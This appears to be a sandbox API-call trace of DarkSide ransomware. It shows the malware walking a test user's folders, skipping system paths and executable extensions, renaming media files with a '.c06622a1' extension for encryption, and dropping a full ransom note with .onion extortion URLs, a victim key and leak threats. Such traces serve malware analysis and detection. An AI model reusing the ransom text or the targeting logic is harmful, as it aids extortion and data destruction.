[0156.227] wcslen (_String="cmd") returned 0x3 [0156.227] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.228] wcslen (_String="com") returned 0x3 [0156.228] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.228] wcslen (_String="cpl") returned 0x3 [0156.228] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.228] wcslen (_String="cur") returned 0x3 [0156.228] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.228] wcslen (_String="deskthemepack") returned 0xd [0156.228] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.228] wcslen (_String="diagcab") returned 0x7 [0156.228] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.228] wcslen (_String="diagcfg") returned 0x7 [0156.228] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.228] wcslen (_String="diagpkg") returned 0x7 [0156.228] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.228] wcslen (_String="dll") returned 0x3 [0156.228] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.228] wcslen (_String="drv") returned 0x3 [0156.228] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.228] wcslen (_String="exe") returned 0x3 [0156.228] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.228] wcslen (_String="hlp") returned 0x3 [0156.228] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.228] wcslen (_String="icl") returned 0x3 [0156.228] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.228] wcslen (_String="icns") returned 0x4 [0156.228] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.228] wcslen (_String="ico") returned 0x3 [0156.228] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.228] wcslen (_String="ics") returned 0x3 [0156.228] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.228] wcslen (_String="idx") returned 0x3 [0156.228] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.228] wcslen (_String="ldf") returned 0x3 [0156.228] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.228] wcslen (_String="lnk") returned 0x3 [0156.228] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.228] wcslen (_String="mod") returned 0x3 [0156.228] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.229] wcslen (_String="mpa") returned 0x3 [0156.229] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.229] wcslen (_String="msc") returned 0x3 [0156.229] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.229] wcslen (_String="msp") returned 0x3 [0156.229] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.229] wcslen (_String="msstyles") returned 0x8 [0156.229] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.229] wcslen (_String="msu") returned 0x3 [0156.229] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.229] wcslen (_String="nls") returned 0x3 [0156.229] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.229] wcslen (_String="nomedia") returned 0x7 [0156.229] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.229] wcslen (_String="ocx") returned 0x3 [0156.229] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.229] wcslen (_String="prf") returned 0x3 [0156.229] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.229] wcslen (_String="ps1") returned 0x3 [0156.229] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.229] wcslen (_String="rom") returned 0x3 [0156.229] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.229] wcslen (_String="rtp") returned 0x3 [0156.229] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.229] wcslen (_String="scr") returned 0x3 [0156.229] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.229] wcslen (_String="shs") returned 0x3 [0156.229] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.229] wcslen (_String="spl") returned 0x3 [0156.229] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.229] wcslen (_String="sys") returned 0x3 [0156.229] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.229] wcslen (_String="theme") returned 0x5 [0156.229] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.229] wcslen (_String="themepack") returned 0x9 [0156.229] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.229] wcslen (_String="wpx") returned 0x3 [0156.229] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.230] wcslen (_String="lock") returned 0x4 [0156.230] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.230] wcslen (_String="key") returned 0x3 [0156.230] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.230] wcslen (_String="hta") returned 0x3 [0156.230] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.230] wcslen (_String="msi") returned 0x3 [0156.230] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.230] wcslen (_String="pdb") returned 0x3 [0156.230] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0156.230] wcslen (_String="sql") returned 0x3 [0156.230] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.230] wcslen (_String="sqlite") returned 0x6 [0156.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe")) returned 0x10 [0156.230] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0156.230] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" [0156.230] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe") returned 0x3c [0156.230] wcscpy (in: _Dest=0x450010a, _Source="78UJVg7V.mp4" | out: _Dest="78UJVg7V.mp4") returned="78UJVg7V.mp4" [0156.231] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4", dwFileAttributes=0x80) returned 1 [0156.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\78ujvg7v.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0156.231] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.231] ReadFile (in: hFile=0x618, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0156.232] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x32b935f9 [0156.232] RtlComputeCrc32 (PartialCrc=0x35f9, Buffer=0x3fe8f4, Length=0x80) returned 0xdb8da340 [0156.232] RtlComputeCrc32 (PartialCrc=0xa340, Buffer=0x3fe8f4, Length=0x80) returned 0x8cbb98fc [0156.232] RtlComputeCrc32 (PartialCrc=0x98fc, Buffer=0x3fe8f4, Length=0x80) returned 0x3a7a4b67 [0156.232] RtlComputeCrc32 (PartialCrc=0x4b67, Buffer=0x3fe8f4, Length=0x80) returned 0x154862dd [0156.232] CloseHandle (hObject=0x618) returned 1 [0156.232] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0156.232] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4" [0156.232] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4") returned 0x49 [0156.232] wcscpy (in: _Dest=0x451012a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.232] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\78ujvg7v.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\78ujvg7v.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\78UJVg7V.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\78ujvg7v.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0156.240] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.240] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2880020 [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x580af592 [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7cb5d4ea [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x62e9ecf9 [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24ccec31 [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e8d70a [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66d93e6a [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68c1f88a [0156.245] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x63cf54d8 [0156.249] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2880094, Length=0x80) returned 0xc1c31419 [0156.249] RtlComputeCrc32 (PartialCrc=0x1419, Buffer=0x2880094, Length=0x80) returned 0xfe6385c4 [0156.249] RtlComputeCrc32 (PartialCrc=0x85c4, Buffer=0x2880094, Length=0x80) returned 0x3dc98d9e [0156.249] RtlComputeCrc32 (PartialCrc=0x8d9e, Buffer=0x2880094, Length=0x80) returned 0x70e67042 [0156.249] RtlComputeCrc32 (PartialCrc=0x7042, Buffer=0x2880094, Length=0x80) returned 0xa4112d76 [0156.249] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.249] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0156.249] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0156.249] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x194cb460, ftCreationTime.dwHighDateTime=0x1d5e6a4, ftLastAccessTime.dwLowDateTime=0x2e6a12a0, ftLastAccessTime.dwHighDateTime=0x1d5e4fd, ftLastWriteTime.dwLowDateTime=0x2e6a12a0, ftLastWriteTime.dwHighDateTime=0x1d5e4fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iOgAhCv1rp-V82bQ", cAlternateFileName="IOGAHC~1")) returned 1 [0156.249] _wcsicmp (_Str1="$recycle.bin", _Str2="iOgAhCv1rp-V82bQ") returned -69 [0156.249] wcslen (_String="$recycle.bin") returned 0xc [0156.250] _wcsicmp (_Str1="config.msi", _Str2="iOgAhCv1rp-V82bQ") returned -6 [0156.250] wcslen (_String="config.msi") returned 0xa [0156.250] _wcsicmp (_Str1="$windows.~bt", _Str2="iOgAhCv1rp-V82bQ") returned -69 [0156.250] wcslen (_String="$windows.~bt") returned 0xc [0156.250] _wcsicmp (_Str1="$windows.~ws", _Str2="iOgAhCv1rp-V82bQ") returned -69 [0156.250] wcslen (_String="$windows.~ws") returned 0xc [0156.250] _wcsicmp (_Str1="windows", _Str2="iOgAhCv1rp-V82bQ") returned 14 [0156.250] wcslen (_String="windows") returned 0x7 [0156.250] _wcsicmp (_Str1="appdata", _Str2="iOgAhCv1rp-V82bQ") returned -8 [0156.250] wcslen (_String="appdata") returned 0x7 [0156.250] _wcsicmp (_Str1="application data", _Str2="iOgAhCv1rp-V82bQ") returned -8 [0156.250] wcslen (_String="application data") returned 0x10 [0156.250] _wcsicmp (_Str1="boot", _Str2="iOgAhCv1rp-V82bQ") returned -7 [0156.250] wcslen (_String="boot") returned 0x4 [0156.250] _wcsicmp (_Str1="google", _Str2="iOgAhCv1rp-V82bQ") returned -2 [0156.250] wcslen (_String="google") returned 0x6 [0156.250] _wcsicmp (_Str1="mozilla", _Str2="iOgAhCv1rp-V82bQ") returned 4 [0156.250] wcslen (_String="mozilla") returned 0x7 [0156.250] _wcsicmp (_Str1="program files", _Str2="iOgAhCv1rp-V82bQ") returned 7 [0156.250] wcslen (_String="program files") returned 0xd [0156.250] _wcsicmp (_Str1="program files (x86)", _Str2="iOgAhCv1rp-V82bQ") returned 7 [0156.250] wcslen (_String="program files (x86)") returned 0x13 [0156.250] _wcsicmp (_Str1="programdata", _Str2="iOgAhCv1rp-V82bQ") returned 7 [0156.250] wcslen (_String="programdata") returned 0xb [0156.250] _wcsicmp (_Str1="system volume information", _Str2="iOgAhCv1rp-V82bQ") returned 10 [0156.250] wcslen (_String="system volume information") returned 0x19 [0156.250] _wcsicmp (_Str1="tor browser", _Str2="iOgAhCv1rp-V82bQ") returned 11 [0156.250] wcslen (_String="tor browser") returned 0xb [0156.250] _wcsicmp (_Str1="windows.old", _Str2="iOgAhCv1rp-V82bQ") returned 14 [0156.250] wcslen (_String="windows.old") returned 0xb [0156.250] _wcsicmp (_Str1="intel", _Str2="iOgAhCv1rp-V82bQ") returned -1 [0156.250] wcslen (_String="intel") returned 0x5 [0156.250] _wcsicmp (_Str1="msocache", _Str2="iOgAhCv1rp-V82bQ") returned 4 [0156.250] wcslen (_String="msocache") returned 0x8 [0156.250] _wcsicmp (_Str1="perflogs", _Str2="iOgAhCv1rp-V82bQ") returned 7 [0156.250] wcslen (_String="perflogs") returned 0x8 [0156.250] _wcsicmp (_Str1="x64dbg", _Str2="iOgAhCv1rp-V82bQ") returned 15 [0156.250] wcslen (_String="x64dbg") returned 0x6 [0156.251] _wcsicmp (_Str1="public", _Str2="iOgAhCv1rp-V82bQ") returned 7 [0156.251] wcslen (_String="public") returned 0x6 [0156.251] _wcsicmp (_Str1="all users", _Str2="iOgAhCv1rp-V82bQ") returned -8 [0156.251] wcslen (_String="all users") returned 0x9 [0156.251] _wcsicmp (_Str1="default", _Str2="iOgAhCv1rp-V82bQ") returned -5 [0156.251] wcslen (_String="default") returned 0x7 [0156.251] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\*" [0156.251] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\*") returned 0x3e [0156.251] wcscpy (in: _Dest=0x44e00fa, _Source="iOgAhCv1rp-V82bQ" | out: _Dest="iOgAhCv1rp-V82bQ") returned="iOgAhCv1rp-V82bQ" [0156.251] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0156.251] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0156.252] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" [0156.252] GetNamedSecurityInfoW () returned 0x0 [0156.252] SetEntriesInAclW () returned 0x0 [0156.252] SetNamedSecurityInfoW () returned 0x0 [0156.256] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d587d8) returned 1 [0156.256] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.256] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 1 [0156.257] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.257] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.257] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.258] CloseHandle (hObject=0x678) returned 1 [0156.258] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 0x10 [0156.258] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\") returned="" [0156.258] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\") returned 0x4e [0156.258] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0156.258] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x194cb460, ftCreationTime.dwHighDateTime=0x1d5e6a4, ftLastAccessTime.dwLowDateTime=0xdbc052e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbc052e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.259] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9f9230, ftCreationTime.dwHighDateTime=0x1d5d8ab, ftLastAccessTime.dwLowDateTime=0x5b73aee0, ftLastAccessTime.dwHighDateTime=0x1d5e4d6, ftLastWriteTime.dwLowDateTime=0x5b73aee0, ftLastWriteTime.dwHighDateTime=0x1d5e4d6, nFileSizeHigh=0x0, nFileSizeLow=0x3911, dwReserved0=0x0, dwReserved1=0x0, cFileName="9SrRbKrmvJ.avi", cAlternateFileName="9SRRBK~1.AVI")) returned 1 [0156.259] _wcsicmp (_Str1="9SrRbKrmvJ.avi", _Str2="README.c06622a1.TXT") returned -57 [0156.259] wcsstr (_Str="9SrRbKrmvJ.avi", _SubStr="README") returned 0x0 [0156.260] _wcsicmp (_Str1="autorun.inf", _Str2="9SrRbKrmvJ.avi") returned 40 [0156.260] wcslen (_String="autorun.inf") returned 0xb [0156.260] _wcsicmp (_Str1="boot.ini", _Str2="9SrRbKrmvJ.avi") returned 41 [0156.260] wcslen (_String="boot.ini") returned 0x8 [0156.260] _wcsicmp (_Str1="bootfont.bin", _Str2="9SrRbKrmvJ.avi") returned 41 [0156.260] wcslen (_String="bootfont.bin") returned 0xc [0156.260] _wcsicmp (_Str1="bootsect.bak", _Str2="9SrRbKrmvJ.avi") returned 41 [0156.260] wcslen (_String="bootsect.bak") returned 0xc [0156.260] _wcsicmp (_Str1="desktop.ini", _Str2="9SrRbKrmvJ.avi") returned 43 [0156.260] wcslen (_String="desktop.ini") returned 0xb [0156.260] _wcsicmp (_Str1="iconcache.db", _Str2="9SrRbKrmvJ.avi") returned 48 [0156.260] wcslen (_String="iconcache.db") returned 0xc [0156.260] _wcsicmp (_Str1="ntldr", _Str2="9SrRbKrmvJ.avi") returned 53 [0156.260] wcslen (_String="ntldr") returned 0x5 [0156.260] _wcsicmp (_Str1="ntuser.dat", _Str2="9SrRbKrmvJ.avi") returned 53 [0156.260] wcslen (_String="ntuser.dat") returned 0xa [0156.260] _wcsicmp (_Str1="ntuser.dat.log", _Str2="9SrRbKrmvJ.avi") returned 53 [0156.260] wcslen (_String="ntuser.dat.log") returned 0xe [0156.260] _wcsicmp (_Str1="ntuser.ini", _Str2="9SrRbKrmvJ.avi") returned 53 [0156.260] wcslen (_String="ntuser.ini") returned 0xa [0156.260] _wcsicmp (_Str1="thumbs.db", _Str2="9SrRbKrmvJ.avi") returned 59 [0156.260] wcslen (_String="thumbs.db") returned 0x9 [0156.260] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.260] wcslen (_String="386") returned 0x3 [0156.260] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.260] wcslen (_String="adv") returned 0x3 [0156.260] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.260] wcslen (_String="ani") returned 0x3 [0156.260] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.260] wcslen (_String="bat") returned 0x3 [0156.260] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.260] wcslen (_String="bin") returned 0x3 [0156.260] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.260] wcslen (_String="cab") returned 0x3 [0156.260] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.260] wcslen (_String="cmd") returned 0x3 [0156.260] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.261] wcslen (_String="com") returned 0x3 [0156.261] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.261] wcslen (_String="cpl") returned 0x3 [0156.261] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.261] wcslen (_String="cur") returned 0x3 [0156.261] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.261] wcslen (_String="deskthemepack") returned 0xd [0156.261] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.261] wcslen (_String="diagcab") returned 0x7 [0156.261] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.261] wcslen (_String="diagcfg") returned 0x7 [0156.261] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.261] wcslen (_String="diagpkg") returned 0x7 [0156.261] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.261] wcslen (_String="dll") returned 0x3 [0156.261] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.261] wcslen (_String="drv") returned 0x3 [0156.261] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.261] wcslen (_String="exe") returned 0x3 [0156.261] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.261] wcslen (_String="hlp") returned 0x3 [0156.261] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.261] wcslen (_String="icl") returned 0x3 [0156.261] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.261] wcslen (_String="icns") returned 0x4 [0156.261] _wcsicmp 